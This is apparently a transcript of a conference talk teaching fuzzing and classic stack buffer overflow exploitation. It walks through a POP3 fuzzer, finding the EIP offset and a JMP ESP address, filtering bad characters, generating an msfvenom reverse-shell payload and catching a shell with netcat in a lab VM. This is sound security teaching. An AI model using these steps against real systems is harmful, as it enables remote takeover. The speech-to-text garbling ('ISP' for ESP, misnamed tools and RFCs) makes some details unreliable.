Yeah. Hello everyone, welcome aboard at my talk. I'm glad for be here with you all. My talk is about fuzzing. Find your own bugs in 0 days. My name is Rodolpho Concurde, but you can call me by my nickname ROd0X. A little about me. I'm a implementation tester, instructor of IT, consultant of information security throughout 30 years. I'm certified ethical hacker by ASC Council. I'm giving talks at Hacking the Box, Mortero.com, Reddit in Village, StackConf, besides Athens, and besides attacks. I'm an author in Hack9 magazine about Stack Overflow and the Pentest magazine about Discovery Channel. From Frozen to get a shell, from SE8 override to get a shell. And here we have my LinkedIn profile and my email for you can contact me. If you have some doubts, you can contact me by my LinkedIn profile or by my email. Our agenda. We will see about fuzzing, types of targets, types of attacks, types of fuzzers, buffer overflow, and we have a POC. Types of targets. We have protocols, FTP, POP3, SMTP, Telnet, any protocol. Application, any input of any application. File format, any file format. MP3, M2U, MP4 for test the software's reader. This is these types of targets. Types of attacks. Fuzzers would try combinations of attacks on numbers, chars, metadata, pure binary sequences. It sent for the target one list with the sequence of dangerous string. Again, it sent for the target one list with the sequence of dangerous strings. And here we have some examples of dangerous strings. Types of fuzzers. Characteristics. Dumb smart fuzzing. Dumb, any string combination. Smart fuzzing. Smart fuzzers are programmed with knowledge of the input format, protocol definition, or rules for the file format. Smart fuzzers might be mutation, generation, evolutionary. This is a complex subject. I leave here a link for F-Secure websites with more information about smart fuzzing. I leave here a link for F-Secure websites with more information about smart fuzzing. Buffer Overflow. Buffer Overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundaries and overwrites adjacent memory locations. Might be heap-based or stack-based. Heap-based, placed in the memory which allocates a lot amount of data and dynamically. Stack-based, allocate a limited or fixed size of data, such as data from local variables or functions. Here we have a buffer overflow code example. In this code example, label buffer, char buffer, with size of 5 bytes, What's problem with this code? This problem with this code is that this code don't verify what application should do if the user insert more than 5 bytes. So if the user insert more than 5 bytes, the application will crash. Again, if the user insert more than 5 bytes, this application will crash. Here we have some image about Buffer Overflow. In left image we have variable flow with 11 A's. In the right images we have variable flow with 150 A's. As we can see, this characters A's overwrite the register ISP, the register BP. Now we have a POC. Discover input format to realize fuzz. Example of protocol POP3. In this code we have a script to make a fuzzing to get a crash of application. In this code we have variable buffer with character A and counter with 100 bytes. Here we have string, so we will send a lot amount of character A against the target IP in port 110. And here we have a command user and command pass. This command user and command pass is specified in document ASC2021. This protocol POP3 uses command user and command pass. Each protocol has your own command. Other protocols use other commands. But in this case, protocol POP3 uses command user command pass. In this script, we will send command pass a lot amount of character A in command pass. Again, this command user command pass is specified in document ASC2081. This document has specification for protocol POP3. Others protocol has others specification in others documents. Protocol POP3 has specification in the specification that protocol POP3 will use command pass. In command pass, we send a lot amount of character A. So let's see the video POC. Let's see the video POC. Send map. So let's see the video POC. As we can see the video POC, any map against the targets, we have a port 110 as open, port 110 as open, running protocol POP3. Let's open the Fuzzing Python script. Here in Fuzzing Python script we have a variable buffer with character A. We'll send a lot amount of character A against the target IP port 110. Again, we send a lot amount of character A against the target IP port 110. We'll send in command pass plus string. We'll send in command pass a lot amount of character A. Again, we send in command pass a lot amount of character A. Let's run in the Python fuzzing script. And now let's run Nmap again. And now, as we can see, we have a port 110 is down. Port 110 is down. The fuzzing caused crash in port 110. Here we have vulnerable software to download. As we can see, port 110 was open, but after fuzzing application, port 110 is down. Now let's see another video POC. Here we have vulnerable software to download. I'll become available this presentation slides on my LinkedIn profile. So after, for who want download of these slides, I'll become available on my LinkedIn profile these slides, and we will open the vulnerable software in Vulnerable Debugger. Let's see another video POC. Let's open the exploit code. In this video POC, we will learn how to create step by step your own exploit code. We will learn how to create step by step your own exploit code. We have here a variable buffer. Generate this file. We have variable buffer with a lot amounts of characters. These characters was generated by partner create. We're gonna use a tool partner create -l the length 50,000 for generate a lot amount of characters. So we use partner create -l the length 50,000 for generate a lot amount of characters. This a lot amount of characters we copy and paste in our exploit code, because we will send a lot amount of we will load a lot amount of characters in our vulnerable software. We load a lot amount of characters in vulnerable software with objective of cause crash in vulnerable software. So let's compile our exploit code with per per and the name of exploit code to compile the exploit code. Let's move our compiled exploit code to a desktop. Let's copy our compiled exploit code to a victim VM. Let's open the Immunity Debugger. Let's run our vulnerable software. Let's attach vulnerable software Immunity Debugger. Let's attach vulnerable software Immunity Debugger. Let's run the vulnerable software Immunity Debugger. Let's run vulnerable software Immunity Debugger. Now let's load our compiled exploit code in vulnerable software. And we have a vulnerable software that crash. Here we have a register ISP with a lot amount of characters. So we load a lot amount of characters in vulnerable software, and we get a crash. And here we have a register ISP with a lot amount of characters, and here we have a stack with a lot amount of characters. Here we have a stack overflow. Here we have a stack overflow, a lot amount of characters in stack. And a lot amount of characters in register ISP. And here we have a value in register IP. What's the function of register IP? Register IP indicates the next address that the processor will execute. Again, the register IP indicates the next address that the CPU will execute. The register IP indicates the next address that the CPU will execute. And here we have a value in register IP. We need to find an offset of register IP. For this, we will use a tool pattern offset. For this, we typed pattern offset -L length 50 downs -Q and the value of register IP. The value of register IP, because we want to find an offset of register IP. Again, we want to find an offset of register IP. For this, we typed pattern offset. We use a pattern offset tool. For this, we typed the pattern offset -L length 50 downs -Q and the value of register IP. And we found an offset 35 downs to 56. Offset 35 downs to 56. Let's open again our exploit code. Let's open our exploit code. Here we have a variable buffer size with 50 bytes. It's a total of this byte is 50 bytes. Variable junk with x41. X41 means character A. Again, x41 means character A. Multiplied by 35 downs to 56. It means that we will load vulnerable software. We will load vulnerable software with X41 will load the vulnerable software with character A. X41 means character A multiplied by 35 down to 56. And below we have variable EIP with this address. This address means jump ISP. We need to find an address that makes jump from EIP to ISP. Now we will learn how to find a jump ISP address. We will learn how to find a jump ISP address because we need to find some address that make jump from EIP to ISP. Because in ISP we will put our shell code. Again, in ISP we will put our shell code in place of this allotted amount of these characters. In place of this allotted amount of characters, we will put our shell code to make a reverse shell. We will put our shell code to get a reverse shell. So we type in command bar exclamation modules exclamation modules a module msvols.dll. We will use a module msvols.dll because this module has a safe SE8 as false, ASLR as false, and NX complete as false. This module has a secure mechanisms as false. For this, we will use this module msvols.dll. This module has a secure mechanisms as false. This module again has secure mechanisms as false. For this, we need to search and we found a module msvols.dll because this module has a secure mechanisms as false. Inside this module, we need to find an expression jump ISP. For this, we will use a tool NASM shell. We typed NASM shell jump ISP. We want to find a opcode for jump ISP. Again, we need to find inside of this module msvols.dll, we need to find the expression jump ISP. Opcode for jump ISP is FFE4. FFE4 means jump ISP. Again, FFE4 means jump ISP. Let's type in command bar exclamation mona find -s the search FFE4 -m the module msvols.dll exclamation mona find search -s search FF4 that means jump ISP. For this search find search jump ISP FF4 inside the module msvols.dls. Search FF4 that means jump ISP inside the module msvols.dll. And we found the address 01BA135B. This address here, this address 01BA135B has an opcode FFE4 with secure mechanism as false. Again, this address 01BA135B has opcode as FE4, that means jump ISP, with secure mechanisms as false, because we want to make a jump from ISP to ISP, because in ISP we will put our shell code to make a reverse shell. So for this we write in our exploit code in variable EIP we typed 5B13BA01. 5B13BA01 is a jump ISP address unlike. We need to type unlike because architecture x86 require that we typed unlike. This is a characteristic of architecture x86. So we typed 01BA13 5B unlike. So we have address jump ISP, address that make jump ISP, address 5B13BA01. It's an address that make jump from ISP to ISP. For this we typed in variable ISP 5B13BA01. This is an address that make a jump ISP. And now we need to find a bad shards, bad characters. We put in variable bad shards a value from 01 up FF. We put in variable bad shards value from 1 up FF. Let's learn more what means bad characters. Now we need to search bad characters. Depending on the application, type of vulnerability and the protocols in use, maybe certain characters which are considered bad and should not be used in our buffer or shell code. One example of bad character is 0. This character is considered bad because a null byte is also used to terminate a sync copy operation, which would truncate our buffer whenever the null bytes appear. So has some characters that are considered bad and not should be used in your buffer or shell code. One example of bad characters is a 00. So now we need to find bad characters in our vulnerable software. For this, we will send characters from 01 up FF. Characters from 01 up FF we will load in our vulnerable software with the objective of find bad characters. Here we have exploit equals junk concatenated with I concatenated with bad shards. We will load in vulnerable software junk, IIP and bad shards. We will load in vulnerable software all bad shards with the objective of define bad characters. Now let's compile our exploit code per and the name of exploit code, and we have output of a compiled exploit code. Let's move our compiled exploit code to our desktop. Let's restart our vulnerable software. Let's run our vulnerable software. Let's copy our compiled exploit code to a victim VM. Let's copy our compiled exploit code to a victim VM. Let's click right button in Moodle Debugger, go to expression to find the address of jump ISP 01BA135B. We will search 01BA135B. This is an address that make a jump ISP. As we can see, we have opcode FF4 means expression jump ISP. Opcode FF4 means expression jump ISP because we want to make a jump from IP to ISP. We want to make a jump from IP to ISP because ISP will put our shell code. Double click in FF4 to put a breakpoint. Again, double click in FF4 to put a breakpoint to stop the flow of execution in FF4. And then let's load our compiled exploit code in vulnerable software. Let's load the compiled exploit code in vulnerable software. As we can see, now the register IP is 01BA135B. The register IP is 01BA135B. That's an address that make jump to ISP, jump from register IP to ISP. And the ISP, click with right button following dump, right button ISP following dump, and let's see the value. Here we have 01, 02, 03, 04, 05, 06, 07, 08, and after 000000. As we can see, occurs some error here. Because we don't have here 09, 08, 0B, and etc. Occurs some error here because here we have some bad shards. Occurs some error here because loaded some bad characters in vulnerable software. So we need to find what is bad characters in our buffer. Let's see in our exploit code. We know that characters 0A is a bad character. In this case, 0A is a bad character. For this, we need to erase a 0A. We need to erase a 0A because 0A is a bad character. 0A is a bad character. Let's save this file and compile exploit code again. Compile exploit code again. Move compiled exploit code to a desktop. Let's restart a victim VM. Let's restart a Moodle debugger. Let's start a Moodle debugger. Running a vulnerable software Moodle debugger again. Running a vulnerable software Moodle debugger again. Click right button, go to expression. Let's find our jump ISP address. Double click in FF4 to put a breakpoint in jump ISP address. Double click in FF4 to put a breakpoint in jump ISP address. Let's copy our compiled exploit code in victim VM. Let's copy our compiled exploit code in victim VM. We have breakpoint in jump ISP. Let's load our compiled exploit code in vulnerable software, and the flow of execution is stopped again in jump ISP address. Registry IP 01BA135B, registry IP 01BA135B is an address that make a jump ISP. And let's click right button in ISP following dump for see the buffers. And now we have 01, 02, 03, 04, 05, 06, 07, 08, 09, and then now 0B, 0C, 0D, 0E, 0F, and etc. Now we don't have more error. Because we discovered that 0A is a bad character. 0A is a bad character. For this we avoid a 0A. We avoid a 0A because a 0A is a bad character. We take out a 0A, and now we have after 09, 0B, 0C, 0D, 0E, 0F, and etc. up FF. So we discovered that 00 and 0A is a bad characters. Now we need to generate a shell code avoiding a 000A because 000A is a bad character. Let's restart Immunity Debugger and running again vulnerable software Immunity Debugger. Restart Immunity Debugger and running vulnerable software Immunity Debugger again. Click right button, go to expression, search 01BA135B. It's an address that make jump ISP. We find a jump ISP address. Let's put a breakpoint in jump ISP address with a double click in FF4. Double clicking FF4 to put a breakpoint in jump ISP. Put a breakpoint in jump ISP with double clicking in FF4. Now let's generate our shell code to make a reverse shell. Let's generate our shell code to make a reverse shell, to get a shell. For this, we will use a tool MSF Venom. You should type MSF Venom -P, the payload, Windows Shell Reverse TCP, lhost, localhost, your IP address, lport 5555, -F file per, -E encode katakana, -B of bad shares, 0A00. So let's B of avoid bad shares 0A00. We will avoid a bad characters 0A00. We will avoid in our shell code a bad characters 0A00. We gonna avoid a bad character 0A00 in our shell code. We generate a shell code without 0A00. Let's see our exploit code. And now we have variable shell. In variable shell, we will put our shell code to get a reverse shell. So let's remember, we have here buff size 50,000 is a total of bytes, 50,000 bytes. Variable junk x41 multiplied by 35.56. X41 means character A. We will load in vulnerable software X41, that means character A, multiplied by offset of EIP. Offset of EIP is 35.56. We will overwrite register EIP with address that make jump ISP. Again, we will overwrite register EIP with address that make jump ISP. Address that make jump ISP is 5B13BA01. Address that make jump ISP is 5B13BA01. In ISP, we will put some noops. Noops means no operations because do nothing. The value for the noops is 90. We will put some 90, that means some noops, that means no operations because do nothing. We will put some noops in ISP, and even in ISP we will put our shell. In ISP we will put some noops, and even in ISP after we put our shell code to make a reverse shell. We will put in ISP some noops do nothing, and even in ISP we will put our shell code to make a reverse shell. So let's erase our old shell code. Let's erase our old shell code to put a new shell code. Let's erase our old shell code to put our new shell code. We have here our new shell code to make a reverse shell. Copy selection, copy our new shell code, and paste our new shell code in our exploit code. Paste our new shell code in our exploit code. Here we have exploit equals junk concatenated with EIP, concatenated with noops, concatenated with shell. Because we will load our vulnerable software all these junk, EIP, noops, and shell. We will load in our vulnerable software all these junk, EIP, noops, and shell. Junk's up offset of EIP. EIP will overwrite of address jump ISP. In ISP we will put some noops and shell. In ISP we will put our shell code. Again, in ISP we will put our shell code to get a reverse shell. Let's save the file. Compile our exploit code. We have output POC file. POC file is output of our shell code. Let's move the POC file to a desktop. Now let's put a netcache to listen on port 5555. For this, type netcat-l nvp 5555 to put a netcache to listen on 5555. Let's copy our compiled exploit code to a victim VM. Let's copy our compiled exploit code to a victim VM. Copy a POC file to a victim VM. And let's load our compiled exploit code to vulnerable software. Let's load our compiled exploit code POC file to a vulnerable software. The process, the flow of execution stopped in address jump ISP. The flow of execution stopped in jump ISP address. Let's click in ISP. Let's click in right button following dump. In ISP, let's click in following dump. Right button following dump. And we have here our noops 90, 90, 90, 90, 90, and after BA we have our shell code, our buffer BA B097. Here we have BA B097. We have here our noops, that means no operations because does nothing. The CPU will do nothing. In ISP, the CPU will do nothing when reading noops. When reading noops will do nothing, and after will execute our shell code. We have here our shell code. BA B097 is our shell code. Here will execute our shell code. Let's click in running in Muniri Debugger, and let's see our netcat. Then we get a shell. We have a shell. Here in netcat we have a connect back. We have a shell. Let's see ipconfig and the net user ROd0X and the administrator. So is it. We get a shell. Here in these slides, we have here step by step of how you can write your own exploit code. I'll become available on my LinkedIn profile this link for these slides for who wanted to make a download for these slides, because these slides have step by step of how you can write your own exploit code. Thank you everyone for watching me. Now I'll open for the question. Thank you very much.